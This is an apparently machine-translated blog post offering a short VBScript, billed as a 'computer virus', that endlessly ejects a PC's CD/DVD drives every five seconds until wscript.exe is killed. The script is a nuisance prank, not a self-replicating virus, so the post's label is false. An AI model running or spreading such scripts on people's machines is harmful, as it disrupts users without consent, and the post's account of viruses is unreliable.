CREATING COMPUTER VIRUSES

CREATING COMPUTER VIRUSES

Creating computer viruses CREATING COMPUTER VIRUSESInternet World is not complete without the presence of viruses. Computer viruses are now growing. Here we discuss about how to create simple virus to save a notepad.

First open notepad and enter this code:

Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save the file with the file extension (. Vbs) and run the 2x click the file, note the CD / DVD ROM will open and close themselves without interruption. One to stop this virus is by pressing the button (CTRL + ALT + DEL) and turn off the process wscripts.exe

Enter your email address:

Delivered by FeedBurner

 ,  computer viruses

  • No Related Post
bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark
tabs-top banner ad

Top incoming search terms for this post

Leave a Reply